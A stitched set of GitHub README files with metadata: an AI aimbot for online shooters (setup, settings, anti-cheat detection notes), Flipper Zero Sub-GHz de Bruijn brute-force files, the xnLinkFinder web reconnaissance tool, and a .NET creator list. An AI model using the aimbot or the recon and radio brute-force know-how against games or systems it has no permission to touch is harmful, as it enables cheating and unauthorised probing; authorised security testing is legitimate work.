**Set Your Environmental Variables** ๐ŸŒŽ Add these paths to your environment: - `C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\lib` - `C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\libnvvp` - `C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin` 11. **Download Pre-trained Models** ๐Ÿค– You can use one of the .engine models we supply. But if it doesn't work, then you will need to re-export it. Grab the `.pt` file here for the model you want. We recommend `yolov5s.pt` or `yolov5m.pt` [HERE ๐Ÿ”—](https://github.com/ultralytics/yolov5/releases/tag/v7.0). 12. **Run the Export Script** ๐Ÿƒโ€โ™‚๏ธ๐Ÿ’ป Time to execute `export.py` with the following command. Patience is key; it might look frozen, but it's just concentrating hard! Can take up to 20 minutes. ``` python .\export.py --weights ./yolov5s.pt --include engine --half --imgsz 320 320 --device 0 ``` Note: You can pick a different YOLOv5 model size. TensorRT's power allows for larger models if desired! If you've followed these steps, you should be all set with TensorRT! โš™๏ธ๐Ÿš€ ## โš™๏ธ Configurable Settings Default settings are generally great for most scenarios. Check out the comments in the code for more insights. ๐Ÿ” The configuration settings are now located in the `config.py` file!<br> **CAPS_LOCK is the default for flipping the switch on the autoaim superpower! โš™๏ธ ๐ŸŽฏ** `useMask` - Set to `True` or `False` to turn on and off ๐ŸŽญ `maskWidth` - The width of the mask to use. Only used when `useMask` is `True` ๐Ÿ“ `maskHeight` - The height of the mask to use. Only used when `useMask` is `True` ๐Ÿ“ `aaQuitKey` - The go-to key is `q`, but if it clashes with your game style, swap it out! โŒจ๏ธโ™ป๏ธ `headshot_mode` - Set to `False` if you're aiming to keep things less head-on and more centered. ๐ŸŽฏโžก๏ธ๐Ÿ‘• `cpsDisplay` - Toggle off with `False` if you prefer not to display the CPS in your command station. ๐Ÿ’ป๐Ÿšซ `visuals` - Flip to `True` to witness the AI's vision! Great for sleuthing out any hiccups. ๐Ÿ•ต๏ธโ€โ™‚๏ธโœ… `aaMovementAmp` - The preset should be on point for 99% of players. Lower the digits for smoother targeting. Recommended doses: `0.5` - `2`. โš–๏ธ๐Ÿ•น๏ธ `confidence` - Stick with the script here unless you're the expert. ๐Ÿงโœจ `screenShotHeight` - Same as above, no need for changes unless you've got a specific vision. ๐Ÿ“๐Ÿ–ผ๏ธ `screenShotWidth` - Keep it constant as is, unless you've got reasons to adjust. ๐Ÿ“๐Ÿ–ผ๏ธ `aaDetectionBox` - Default's your best bet, change only if you've got the know-how. ๐Ÿ“ฆโœ… `onnxChoice` - Gear up for the right graphics card: Nvidia, AMD, or CPU power! ๐Ÿ’ป๐Ÿ‘พ `centerOfScreen` - Keep this switched on to stay in the game's heart. โค๏ธ๐Ÿ–ฅ๏ธ ## ๐Ÿ“Š Current Stats The bot's efficiency depends on your setup. We achieved 100-150 CPS with our test specs below ๐Ÿš€. - AMD Ryzen 7 2700 - 64 GB DDR4 - Nvidia RTX 3080 ๐Ÿ’ก Tip: Machine Learning can be tricky, so reboot if you keep hitting CUDA walls. ## ๐Ÿค Community Based We're all about collaboration. Your contributions can earn you credit and potential ๐Ÿ’ฐ! **Want to volunteer? Have video or program ideas? Tell us!** ## โš ๏ธ Known Cheat-Detectable Games Splitgate (reported by a Discord user ๐Ÿ•ต๏ธโ€โ™‚๏ธ); its EQU8 anti-cheat detects the win32 mouse movement library. ## ๐Ÿš€ Custom Aimbots and Models Show off your work or new models via Pull Requests in `customScripts` or `customModels` directories, respectively. Check out the `example-user` folder for guidance.
## ๐ŸŒ  Future Ideas - [x] Mask Player to avoid false positives Happy Coding and Aiming! ๐ŸŽ‰๐Ÿ‘พ
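To make the Configurable Settings section above more concrete, here is a hypothetical sketch of what the documented knobs in `config.py` might look like; the setting names come from the list above, but every value shown is an illustrative placeholder rather than the project's actual defaults:

```python
# config.py - illustrative sketch only; setting names are from the README's
# Configurable Settings list, values are placeholders, not real defaults.
useMask = False          # toggle the mask feature on or off
maskWidth = 80           # mask width, only used when useMask is True
maskHeight = 200         # mask height, only used when useMask is True
aaQuitKey = "q"          # key that shuts the program down
headshot_mode = True     # False keeps aim centered rather than head-on
cpsDisplay = True        # False hides the CPS readout in the console
visuals = False          # True shows what the AI sees, useful for debugging
aaMovementAmp = 1.0      # movement smoothing, recommended range 0.5 - 2
confidence = 0.5         # detection confidence threshold
screenShotHeight = 320   # capture height
screenShotWidth = 320    # capture width
aaDetectionBox = 320     # detection box size
onnxChoice = 2           # 1 = CPU, 2 = AMD/NVIDIA, 3 = NVIDIA (per the README)
centerOfScreen = True    # prioritise targets near the center of the screen
```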
World's Best AI Aimbot - CS2, Valorant, Fortnite, APEX, every game
machine-learning,aimbot,aimbotcsgo,video-game-ai,aimbot-valorant,aimbot-tarkov,ai-aimbot,ml-aimbot,cs2,cs2-aimbot
0
18
43
122
24
9
0
MuddledBox/FlipperZeroSub-GHz
# FlipperZeroSub-GHz Sub-GHz Files for the Flipper Zero Which de Bruijn file do I use for what? ![image](https://user-images.githubusercontent.com/101580720/160041184-d93d5231-31be-49b4-9ca9-0d4f1b1924b5.png) Add them to your X:\subghz folder on your SD card! UNLOCKED FIRMWARE REQUIRED! Available here: https://github.com/MuddledBox/flipperzero-firmware/releases
Sub-GHz Files for the Flipper Zero
null
0
2
4
29
7
1
0
xnl-h4ck3r/xnLinkFinder
<center><img src="https://github.com/xnl-h4ck3r/xnLinkFinder/blob/main/xnLinkFinder/images/title.png"></center> ## About - v6.3 This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by: - crawling a target (pass a domain/URL) - crawling multiple targets (pass a file of domains/URLs) - searching files in a given directory (pass a directory name) - getting them from a **Burp** project (pass location of a Burp XML file) - getting them from an **OWASP ZAP** project (pass location of a ZAP ASCII message file) - getting them from a **Caido** project (pass location of a Caido export CSV file) - processing a [waymore](https://github.com/xnl-h4ck3r/waymore) results directory (searching archived response files from `waymore -mode R` and also requesting URLs from `waymore.txt` and the original URLs from `index.txt` - see [waymore README.md](https://github.com/xnl-h4ck3r/waymore/blob/main/README.md)) The python script is based on the link finding capabilities of my Burp extension [GAP](https://github.com/xnl-h4ck3r/burp-extensions). As a starting point, I took the amazing tool [LinkFinder](https://github.com/GerbenJavado/LinkFinder) by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more. ## Installation `xnLinkFinder` supports **Python 3**. Install `xnLinkFinder` in the default (global) Python environment. ```bash pip install xnLinkFinder ``` OR ```bash pip install git+https://github.com/xnl-h4ck3r/xnLinkFinder.git -v ``` You can upgrade with ```bash pip install --upgrade xnLinkFinder ``` ### pipx Quick setup in an isolated Python environment using [pipx](https://pypa.github.io/pipx/) ```bash pipx install git+https://github.com/xnl-h4ck3r/xnLinkFinder.git ``` ## Usage | Arg | Long Arg | Description | | ----------- | -------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | -i | --input | Input: a URL, a text file of URLs, a directory of files to search, a Burp XML output file, an OWASP ZAP output file, or a Caido CSV file. | | -o | --output | The file to save the Links output to, including path if necessary (default: output.txt). If set to `cli` then output is only written to STDOUT. If the file already exists it will just be appended to (and de-duplicated) unless option `-ow` is passed. | | -op | --output-params | The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to `cli` then output is only written to STDOUT (but not piped to another program). If the file already exists it will just be appended to (and de-duplicated) unless option `-ow` is passed. | | -owl | --output-wordlist | The file to save the target specific Wordlist output to, including path if necessary (default: No wordlist output). If set to `cli` then output is only written to STDOUT (but not piped to another program). If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed.
| | -oo | --output-oos | The file to save the out of scope links output to, including path if necessary (default: No OOS output). If set to `cli` then output is only written to STDOUT (but not piped to another program). If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed. | | -ow | --output-overwrite | If the output file already exists, it will be overwritten instead of being appended to. | | -sp | --scope-prefix | Any links found starting with `/` will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. | | -spo | --scope-prefix-original | If argument `-sp` is passed, then this determines whether the original link starting with `/` is also included in the output (default: false) | | -spkf | --scope-prefix-keep-failed | If argument `-spkf` is passed, then this determines whether a prefixed link will be kept in the output if it was a 404 or a RequestException occurs (default: false) | | -sf | --scope-filter | Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. This argument is now mandatory if input is a domain/URL (or file of domains/URLs) to prevent crawling sites that are not in scope and also to prevent misleading results. | | -c | --cookies โ€  | Add cookies to pass with HTTP requests. Pass in the format `'name1=value1; name2=value2;'` | | -H | --headers โ€  | Add custom headers to pass with HTTP requests. Pass in the format `'Header1: value1; Header2: value2;'` | | -ra | --regex-after | RegEx for filtering purposes against found endpoints before output (e.g. `/api/v[0-9]\.[0-9]\*` ). If it matches, the link is output. | | -d | --depth โ€  | The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files, ZAP files and Caido files because they can be huge and consume lots of memory. It is also advisable to use the `-sp` (`--scope-prefix`) argument to ensure a request to links found without a domain can be attempted. | | -p | --processes โ€  | Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file, ZAP file or Caido file). This argument determines the number of processes (threads) used (default: 25) | | -x | --exclude | Additional Link exclusions (to the list in `config.yml`) in a comma separated list, e.g. `careers,forum` | | -orig | --origin | Whether you want the origin of the link to be in the output. Displayed as `LINK-URL [ORIGIN-URL]` in the output (default: false) | | -prefixed | | Whether you want to see which links were prefixed in the output. Displays `(PREFIXED)` after link and origin in the output (default: false) | | -xrel | --exclude-relative-links | By default, if any links in the results start with `./` or `../`, they will be included. If this argument is used, these relative links will not be added. | | -t | --timeout โ€  | How many seconds to wait for the server to send data before giving up (default: 10 seconds) | | -inc | --include | Include input (`-i`) links in the output (default: false) | | -u | --user-agent โ€  | What User Agents to get links for, e.g. `-u desktop mobile`. Possible values are `desktop`, `mobile`, `set-top-boxes` and `game-console`.
Also there are `mobile-apple`, `mobile-android` and `mobile-windows` that are subsets of `mobile` but can be used separately. | | -uc | --user-agent-custom โ€  | A custom User Agent string to use for all requests. This will override the `-u`/`--user-agent` argument. This can be used when a program requires a specific User Agent header to identify you for example. | | -insecure | โ€  | Whether TLS certificate checks should be disabled when making requests (default: false) | | -s429 | โ€  | Stop when > 95 percent of responses return 429 Too Many Requests (default: false) | | -s403 | โ€  | Stop when > 95 percent of responses return 403 Forbidden (default: false) | | -sTO | โ€  | Stop when > 95 percent of requests time out (default: false) | | -sCE | โ€  | Stop when > 95 percent of requests have connection errors (default: false) | | -m | --memory-threshold | The memory threshold percentage. If the machine's memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95) | | -mfs | --max-file-size โ€  | The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size is over, it will be ignored (default: 500 MB). Setting to 0 means no files will be ignored, regardless of size. | | -rp | --replay-proxy โ€  | For active link finding with URL (or file of URLs), replay the requests through this proxy. | | -ascii-only | | Whether links and parameters will only be added if they only contain ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason. | | -mtl | --max-time-limit | The maximum time limit (in minutes) to run before stopping (default: 0). If 0 is passed, there is no limit. | | | --config | Path to the YML config file. If not passed, it looks for file `config.yml` in the default directory, typically `~/.config/xnLinkFinder`. | | -nwlpl | --no-wordlist-plurals | When words are found for a target specific wordlist, by default new words are added if there is a singular word from a plural, and vice versa. If this argument is used, this process is not done. | | -nwlpw | --no-wordlist-pathwords | By default, any path words found in the links will be processed for the target specific wordlist. If this argument is used, they will not be processed. **NOTE: if the YAML config value of `respParamPathWords` is `True` then this argument will not have any effect unless `-nwlpm`/`--no-wordlist-parameters` is also passed.** | | -nwlpm | --no-wordlist-parameters | By default, any parameters found in the links will be processed for the target specific wordlist. If this argument is used, they will not be processed. | | -nwlc | --no-wordlist-comments | By default, any comments in pages will be processed for the target specific wordlist. If this argument is used, they will not be processed. | | -nwlia | --no-wordlist-imgalt | By default, any image 'alt' attributes will be processed for the target specific wordlist. If this argument is used, they will not be processed. | | -nwld | --no-wordlist-digits | Exclude any words from the target specific wordlist with numerical digits in. | | -nwll | --no-wordlist-lowercase | By default, any word added with any uppercase characters in will also add the word in lowercase. If this argument is used, the lowercase words will not be added.
| | -wlml | --wordlist-maxlen | The maximum length of words to add to the target specific wordlist, excluding plurals (default: 0 - no limit) | | -swf | --stopwords-file | A file of additional Stop Words (in addition to "stopWords" in the YML Config file) used to exclude words from the target specific wordlist. Stop Words are used in Natural Language Processing and different lists can be found in different libraries. You may want to add words in different languages, depending on your target. | | -brt | --burpfile-remove-tags | When the input passed with `-i` is a Burp file, the user is asked interactively whether they want to remove unnecessary tags from that file (sometimes there is a problem in Burp XML files that can often be resolved by removing unnecessary tags which will also make the file smaller). If you are using xnLinkFinder in a script, you don't want to break for user input, so you can set that by passing this argument with a `true` or `false`. NOTE: This is a permanent change to the file | | -nb | --no-banner | Hides the tool banner. | | -v | --verbose | Verbose output | | -vv | --vverbose | Increased verbose output | | | --version | Show current version number. | | -h | --help | show the help message and exit | โ€  NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE, OWASP ZAP FILE OR CAIDO CSV FILE ## config.yml The `config.yml` file (typically in `~/.config/xnLinkFinder/`) has the keys which can be updated to suit your needs: - `linkExclude` - A comma separated list of strings (e.g. `.css,.jpg,.jpeg` etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list. - `contentExclude` - A comma separated list of strings (e.g. `text/css,image/jpeg,image/jpg` etc.) that all responses `Content-Type` headers are checked against. Any responses with these content types will be excluded and not checked for links. - `fileExtExclude` - A comma separated list of strings (e.g. `.zip,.gz,.tar` etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links. Also, in normal mode, if a response doesn't have a content-type to check for exclusions, it will check for these extensions at the end of the URL to determine whether to search for links. - `regexFiles` - A list of file types separated by a pipe character (e.g. `php|php3|php5` etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g.
`js\.map`
- `respParamLinksFound` † - Whether to get potential parameters from links found in responses: `True` or `False`
- `respParamPathWords` † - Whether to add path words in retrieved links as potential parameters: `True` or `False`
- `respParamJSON` † - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: `True` or `False`
- `respParamJSVars` † - Whether JavaScript variables set with `var`, `let` or `const` are added as potential parameters: `True` or `False`
- `respParamXML` † - If the MIME type of the response contains XML, whether to add XML attribute values as potential parameters: `True` or `False`
- `respParamInputField` † - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: `True` or `False`
- `respParamMetaName` † - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: `True` or `False`
- `wordsContentTypes` - A comma separated list of strings (e.g. `text/html,text/plain`) to specify which response content types will be searched for words to go in the target specific wordlist.
- `stopWords` - A comma separated list of strings (e.g. `then,this,that`) to specify words that are excluded from the target specific wordlist. This default list is initially made up of English determiners, coordinating conjunctions and prepositions, plus a list of stop words from Scikit-Learn, a Python machine learning library.

† IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO `True`

## Examples

### Find Links from a specific target - Basic

```
xnLinkFinder -i target.com -sf target.com
```

### Find Links from a specific target - Detailed

Ideally, provide a scope prefix (`-sp`) with the primary domain (including schema), and a scope filter (`-sf`) to filter the results only to relevant domains (this can be one domain or a file of in-scope domains). Also, you can pass cookies and custom headers to ensure you find links only available to authorised users. Specifying the User Agent (`-u desktop mobile`) will first search for all links using desktop User Agents, and then try again using mobile user agents. There could be specific endpoints that are related to the user agent given. Giving a depth value (`-d`) will keep sending requests to links found on the previous depth search to find more links.

```
xnLinkFinder -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10
```

### Find Links from a list of URLs - Basic

If you have a file of JS file URLs for example, you can look for links in those:

```
xnLinkFinder -i target_js.txt -sf target.com
```

### Find Links from files in a directory - Basic

If you have files, e.g. JS files, HTTP responses, etc., you can look for links in those:

```
xnLinkFinder -i ~/.config/waymore/results/target.com
```

NOTE: Sub directories are also checked. The `-mfs` option can be specified to skip files over a certain size.

### Find Links from a Burp project - Basic

In Burp, select the items you want to search by highlighting the scope for example, right clicking and selecting `Save selected items`. Ensure that the `base64-encode requests and responses` option is checked before saving.
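If you run xnLinkFinder over a Burp file from a script rather than interactively, note that this input normally triggers a prompt asking whether unnecessary tags should be removed from the XML; the `-brt`/`--burpfile-remove-tags` argument (see the Usage table above) answers that prompt up front so the run never blocks. A minimal sketch, assuming an export saved as `target_burp.xml` (the `-nb` flag just hides the banner):

```
# Pre-answer the Burp tag-removal prompt so a scripted run never stops
# for input; passing true instead would permanently strip the tags.
xnLinkFinder -i target_burp.xml -brt false -nb
```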
To get all links from the file (even with HUGE files, you'll be able to get all the links):

```
xnLinkFinder -i target_burp.xml
```

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with `-i` starts with `<?xml` then you are trying to process a Burp file.

### Find Links from a Burp project - Detailed

Ideally, provide a scope prefix (`-sp`) with the primary domain (including schema), and a scope filter (`-sf`) to filter the results only to relevant domains.

```
xnLinkFinder -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv
```

### Find Links from an OWASP ZAP project - Basic

In ZAP, select the items you want to search by highlighting the History for example, clicking the `Export` menu and selecting `Export Messages to File...`. This will let you save an ASCII text file of all requests and responses you want to search.

To get all links from the file (even with HUGE files, you'll be able to get all the links):

```
xnLinkFinder -i target_zap.txt
```

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with `-i` is in the format `==== 99 ==========` (v2.11.1) or `===99 ==========` (v2.12) for example, then you are trying to process an OWASP ZAP ASCII text file.

### Find Links from a Caido export CSV file - Basic

In Caido, go to the **History** section and select the **Export** option. If you are using Caido Pro or Enterprise edition, then choose the **Export current rows** option and pick **As CSV**. Go to the **Exports** section and download the CSV file. Then pass it as input:

```
xnLinkFinder -i 2023-03-18-010332_csv_requests.csv
```

If you are using Caido Community edition, then you will have to choose the **Export all** option and pick **As CSV**. Go to the **Exports** section and download the CSV file. As you have the full history, you will want to remove anything that is not relevant from the CSV file. Use the example below, where `redbull` is the main part of the domains of the target you are looking at.

```
cat 2023-03-18-010332_csv_requests.csv | grep -E '^id|^[0-9]+,[^,]*redbull' > caido_redbull.csv
xnLinkFinder -i caido_redbull.csv
```

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with `-i` is in the format `id,host,method`, then you are trying to process a Caido export CSV file.

### Find Links from a Waymore results directory

The [waymore](https://github.com/xnl-h4ck3r/waymore) tool can be used to get URLs from various third party APIs, and also download archived responses from archive.org (Wayback Machine). Passing a waymore results directory to `xnLinkFinder` will search the contents of archived responses, and will also request the URLs from `waymore.txt` and the archived URLs from `index.txt` to get more links from those responses.

```
xnLinkFinder -i ~/Tools/waymore/results/target.com
```

NOTE: It is passed as a normal directory, but xnLinkFinder will determine it is a waymore results directory and process it accordingly. This relies on the default naming convention of the URLs file being `waymore.txt` and that file being in the same directory as the archived files (which it is by default).

### Piping to other Tools

You can pipe xnLinkFinder to other tools. Any errors are sent to `stderr` and any links found are sent to `stdout`. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file.
For example:

```
xnLinkFinder -i redbull.com -sp https://redbull.com -sf redbull.* -d 3 | unfurl keys | sort -u
```

You can also pass the input through `stdin` instead of `-i`.

```
cat redbull_subs.txt | xnLinkFinder -sp https://redbull.com -sf redbull.* -d 3
```

NOTE: You can't pipe in a Burp, ZAP or Caido file; these must be passed using `-i`.

## Recommendations and Notes

- Always use the Scope Prefix argument `-sp`. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used. Schema is optional, but will default to http):
  ```
  http://www.target.com
  https://target-payments.com
  https://static.target-cdn.com
  ```
  If a link is found that has no domain, e.g. `/path/to/example.js`, then passing `-sp http://www.target.com` will result in the output `http://www.target.com/path/to/example.js`, and if Depth (`-d`) is >1 then a request will be able to be made to that URL to search for more links. If a file of domains is passed using `-sp` then the output will include each domain followed by `/path/to/example.js` and increase the chance of finding more links.
- If you use `-sp` but still want the original link of `/path/to/example.js` (without a domain) additionally returned in the output, then pass the argument `-spo`.
- Always use the Scope Filter argument `-sf`. This will ensure that only relevant domains are returned in the output, and more importantly, if Depth (`-d`) is >1 then out of scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included):
  ```
  target.*
  target-payments.com
  static.target-cdn.com
  ```
  THIS IS FOR FILTERING THE LINKS' DOMAIN ONLY.
- If you want to filter the final output in any way, use `-ra`. It's always a good idea to use https://regex101.com/ to check your Regex expression is going to do what you expect.
- Use the `-v` option to have a better idea of what the tool is doing.
- If you have problems, use the `-vv` option, which may show errors that are occurring; these can possibly be resolved, or you can raise an issue on GitHub.
- Pass cookies (`-c`), headers (`-H`) and regex (`-ra`) values within single quotes, e.g. `-ra '/api/v[0-9]\.[0-9]\*'`
- Set the `-o` option to give a specific output file name for Links, rather than the default of `output.txt`. If you plan on running a large depth of searches, start with a depth of 2 with option `-v` to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass `-ow`.
- Set the `-op` option to give a specific output file name for Potential Parameters, rather than the default of `parameters.txt`. Any output will be appended to the existing file, unless you pass `-ow`.
- If using a high Depth (`-d`), be wary of some sites using dynamic links, as it will just keep finding new ones. If no new links are being found, then xnLinkFinder will stop searching. Providing the stop flags (`-s429`, `-s403`, `-sTO`, `-sCE`) should also be considered.
- If you are finding a large number of links, especially if the Depth (`-d` value) is high, and have limited resources, the program will stop when it reaches the memory Threshold (`-m`) value and end gracefully with data intact before getting killed.
- If you decide to cancel xnLinkFinder (using `Ctrl-C`) in the middle of running, be patient and any gathered data will be saved before ending gracefully.
- Using the `-orig` option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but it will be suffixed with the origin URL in square brackets.
- When making requests, xnLinkFinder will use a random User-Agent from the current group, which defaults to `desktop` (unless the `-uc`/`--user-agent-custom` argument is used). If you have a target that could have different links for different user agent groups, then specify `-u desktop mobile` for example (separate with a space). The `mobile` user agent option is a combination of `mobile-apple`, `mobile-android` and `mobile-windows`. Possible values are `desktop`, `mobile`, `set-top-boxes` and `game-console`.
- When `-i` has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by `-mfs` (default: 500 MB) will be skipped.
- When using the `-rp`/`--replay-proxy` option, sometimes requests can take longer. If you start seeing more `Request Timeout` errors (you'll see errors if you use the `-v` or `-vv` options) then consider using `-t` to raise the timeout limit.
- If you know a target will only have ASCII characters in links and parameters then consider passing `-ascii-only`. This can eliminate a number of false positives that can sometimes get returned from binary data.
- If you pass a [waymore](https://github.com/xnl-h4ck3r/waymore) results directory, it is worth passing the `-d`/`--depth` argument to search any extra links found from URL requests, and also the `-u`/`--user-agent` argument if you think there could be different content found, e.g. `-u desktop mobile`.
- Always pass the `-owl`/`--output-wordlist` filename to save the target specific wordlist (see the example run after this list). This list can be very useful when fuzzing a target.
- The words for the target specific wordlist are taken from the following sources (any of 3 characters or more), but are also determined by the other wordlist arguments (see the Usage section above):
  - All responses with certain conditions:
    - Only responses with content types specified in the YML config `wordsContentTypes` section are searched. The defaults are `text/html`, `application/xml`, `application/json` and `text/plain`.
    - Words from `<meta>` tag content where:
      - `Property` is `og:title` or `og:description`
      - `Name` is `description`, `keywords`, `twitter:title` or `twitter:description`
    - Words from HTML comments
    - Words from the `alt` attribute of `<img>` tags
    - Words from the rest of the inner HTML of the page, excluding tags `<style>`, `<script>` and `<link>`
  - Words found from path words in links found.
  - Parameters found from responses and links.
  - All valid words will also have the singular/plural version added to the wordlist if possible.
  - If the original word has any upper case characters, a lower case version will also be added.
- If the default "Stop Words" for a target specific wordlist are not good enough, either change them in the YML config file, or provide additional stop words using the `-swf`/`--stopwords-file` option. You may want to include stop words in another language, depending on the target. Stop words are used in Natural Language Processing (NLP) and many stop word lists can be found online to suit different needs.
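Pulling several of these recommendations together, the run below is a minimal sketch only; the file names and the depth value are illustrative, not defaults:

```
# Illustrative run combining the recommendations above: a scope prefix and
# scope filter, a modest starting depth with verbose output, named output
# files for links, parameters and the target specific wordlist, and a stop
# flag so heavy rate limiting ends the run early.
xnLinkFinder -i target.com -sp target_prefix.txt -sf target_scope.txt \
  -d 2 -v -s429 \
  -o target_links.txt -op target_params.txt -owl target_wordlist.txt
```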
## Issues

If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on GitHub. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with `-vv` to reproduce the problem and let me know about any error messages that are given.

## TODO

- I seem to have completed all the TODOs I originally had! If you think of any that need adding, let me know 🤘

## Example output

Active link finding for a domain:

<center><img src="https://github.com/xnl-h4ck3r/xnLinkFinder/blob/main/xnLinkFinder/images/example1a.png"></center>

...

<center><img src="https://github.com/xnl-h4ck3r/xnLinkFinder/blob/main/xnLinkFinder/images/example1b.png"></center>

Piped input and output:

<center><img src="https://github.com/xnl-h4ck3r/xnLinkFinder/blob/main/xnLinkFinder/images/example2.png"></center>

Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider [BUYING ME A COFFEE!](https://ko-fi.com/xnlh4ck3r) ☕ (I could use the caffeine!)

🤘 /XNL-h4ck3r

<a href='https://ko-fi.com/B0B3CZKR5' target='_blank'><img height='36' style='border:0px;height:36px;' src='https://storage.ko-fi.com/cdn/kofi2.png?v=3' border='0' alt='Buy Me a Coffee at ko-fi.com' /></a>
A Python tool used to discover endpoints, potential parameters, and a target specific wordlist for a given target
null
35
2
3
83
2
1
0
matthiasjost/dotnet-content-creators
# :zap: My Favourite .NET Content Creators

Please also see [WeAreDotnet](https://www.WeAreDotnet.io), a community for .NET content creators (founded by Tim [@TimCadenbach](https://twitter.com/TimCadenbach) and Matthias [@jost0101](https://twitter.com/jost0101))

The repo accepts new updates, but the amount of effort the maintainer puts into it has been reduced. Most entries are from 2022/2023. I am still reviewing and merging PRs from you.

## ✍️ What Are Creators?

By creators, we mean enthusiasts who create content for Blogs, YouTube, Twitch, Books, and tutorial platforms (e.g. Pluralsight). The content can be free or paid.

## 🗣️ Language

We only list creators and channels with English content.

## 🌎 Why Does The Country Sort The List?

The country doesn't matter, but it is a way to divide the List into sections and challenge everyone to find good creators from all countries.

## 📺 What Are Channels?

Channels contain the links on which the creator is most active.

## ☘️ How To Contribute?

Add your favourite creators by creating a PR.

- Channels: Max. 5 links
- Tags: Max. 5 tags

## :calendar: 2022/23

All creators under this section must have published something in 2022 or 2023.

### Argentina <img src="4x3/ar.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Daniel Cazzulino | [Blog](https://www.cazzulino.com/), [Twitter](https://twitter.com/kzu), [LinkedIn](https://www.linkedin.com/in/danielcazzulino/) | .NET, C# |

### Australia <img src="4x3/au.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Christian Findlay | [Blog](https://christianfindlay.com), [Twitter](https://twitter.com/cfdevelop), [Mastodon](https://fosstodon.org/@cfdevelop) | .NET, C# |
| Jason Taylor | [Blog](https://jasontaylor.dev/), [LinkedIn](https://www.linkedin.com/in/jasontaylordev/), [Twitter](https://twitter.com/jasontaylordev) | .NET |
| Les Jackson | [YouTube](https://www.youtube.com/c/binarythistle), [Blog](https://dotnetplaybook.com/), [Twitter](https://twitter.com/binarythistle), [Linktree](https://linktr.ee/binarythistle) | .NET MAUI, ASP.NET Core, Blazor |
| Rahul Nath | [YouTube](https://www.youtube.com/c/RahulNath), [Twitter](https://twitter.com/rahulpnath), [LinkedIn](https://www.linkedin.com/in/rahulpnath/) | ASP.NET Core, .NET on AWS |
| Rahul Rai | [Blog](https://thecloudblog.net), [LinkedIn](https://www.linkedin.com/in/rahulrai-in/), [Twitter](https://twitter.com/rahulrai_in) | Azure, Kubernetes |

### Austria <img src="4x3/at.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Christian Nagel | [Blog](https://csharp.christiannagel.com), [Twitter](https://twitter.com/ChristianNagel) | .NET, C# |
| Wolfgang Ziegler | [Blog](https://wolfgang-ziegler.com/), [Mastodon](https://fosstodon.org/@wolfgang@hachyderm.io), [LinkedIn](https://www.linkedin.com/in/wolfgangz/) | .NET MAUI, C# |

### Bahrain <img src="4x3/bh.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Naweed Akram | [Blog](https://blogs.xgenoapps.com/), [Twitter](https://twitter.com/xgeno), [YouTube](https://www.youtube.com/@naweedakram), [LinkedIn](https://www.linkedin.com/in/naweed/) | .NET MAUI |

### Bosnia and Herzegovina <img src="4x3/ba.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Admir Mujkic | [Blog](https://admirlive.medium.com/), [LinkedIn](https://www.linkedin.com/in/admir-live/) | .NET, Architecture, C#, AI, EF Core |

### Belgium <img src="4x3/be.svg" height="35">

| Name | Channels | Tags |
| --- | --- | --- |
| Kevin Dockx | [Blog](https://www.kevindockx.com/), [GitHub](https://github.com/kevindockx), [Pluralsight](https://www.pluralsight.com/authors/kevin-dockx), [Twitter](https://twitter.com/kevindockx) | .NET, Architecture, C#, ASP.NET Core, EF Core |
